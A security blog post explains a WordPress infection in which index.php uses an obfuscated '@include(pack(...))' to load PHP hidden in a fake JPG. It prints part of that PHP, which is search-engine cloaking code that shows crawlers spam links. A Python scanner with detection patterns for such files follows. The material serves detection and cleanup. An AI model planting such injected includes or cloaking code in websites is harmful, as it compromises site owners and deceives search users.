Malware disguised as a JPG file in WordPress

Hackers insert malicious include code into index.php

Be careful if your WordPress site suddenly turns white, displays nothing, shows a broken layout, or displays an unknown link or URL.

@include(pack(Obfuscated code));

include reads in another program file, and pack is a function that converts data into a binary string, but it can also be used to embed obfuscated malicious code.
When we decoded the above code, we got the following path:

/wp-includes/images/wp-skin.jpg

It turned out that index.php was reading in this JPG file.

Malware disguised as JPG

When we opened wp-skin.jpg, the file contained the following code.

$fromsite = "http://www.xxxxxx.co.jp/shop/default.aspx";
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);
$filename = "";
$mysite = 'http://'.$_SERVER['HTTP_HOST'].'/'; 
if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false || strpos($tmp, 'msn') !== false || strpos($tmp, 'goo') !== false) {

    $ksite = !empty($_GET['success']) ? $_GET['success'] : "";
    $list = array(
	'present' => 'http://www.xxxxxx.com/',
	'female watch' => 'http://www.xxxxx.com/', 

This code is a type of SEO hack: when the visitor's user agent looks like a crawler such as Google or Yahoo, it makes the crawler see the site as if it linked out with keywords such as “present” or “female watch”.

* This virus pattern definition has already been added to our WordPress malware / virus scanner.
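
Both indicators described on this page, an include whose argument is built by pack(...) and an image file that contains PHP, can be checked for across a WordPress tree. The following Python script is an added example, not code from the original post or from the scanner mentioned above; the function names, the constructed sample files and the decoder names other than pack are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Leading bytes of genuine image files, keyed by extension.
IMAGE_MAGIC = {".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
               ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a")}
# PHP markers that should never appear inside image data.
PHP_MARKERS = re.compile(rb"<\?php|\$_(?:SERVER|GET|POST|REQUEST|COOKIE)\b")
# include/require whose argument comes from a decoder call, e.g. @include(pack(...)).
# pack is the function seen on this page; the other decoder names are assumptions.
OBFUSCATED_INCLUDE = re.compile(
    rb"(?i)\b(?:include|require)(?:_once)?\s*\(?\s*(?:pack|base64_decode|str_rot13|gzinflate)\s*\(")

def check_file(path):
    """Return the reasons a file (a Path) looks suspicious; empty list if none."""
    ext = path.suffix.lower()
    with path.open("rb") as fh:
        data = fh.read(2 * 1024 * 1024)  # the first 2 MiB is enough for these checks
    reasons = []
    if ext in IMAGE_MAGIC:
        if not data.startswith(IMAGE_MAGIC[ext]):
            reasons.append("no image magic number")
        if PHP_MARKERS.search(data):
            reasons.append("PHP code in image file")
    elif ext == ".php" and OBFUSCATED_INCLUDE.search(data):
        reasons.append("include of obfuscated path")
    return reasons

def scan_tree(root):
    """Walk root and return {relative path: reasons} for every flagged file."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and (reasons := check_file(path)):
            findings[path.relative_to(root).as_posix()] = reasons
    return findings

def build_sample_site(root):
    """Constructed sample: tampered index.php, PHP posing as a JPG, a real JPEG header."""
    img = Path(root, "wp-includes", "images")
    img.mkdir(parents=True)
    Path(root, "index.php").write_bytes(b'<?php\n@include(pack("H*", "00"));\n')
    (img / "wp-skin.jpg").write_bytes(b"<?php $tmp = strtolower($_SERVER['HTTP_USER_AGENT']);")
    (img / "blank.jpg").write_bytes(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        for path, reasons in scan_tree(site).items():
            print(path, "->", "; ".join(reasons))
```

To scan a real installation, call scan_tree with the WordPress document root and review each flagged file by hand before deleting anything.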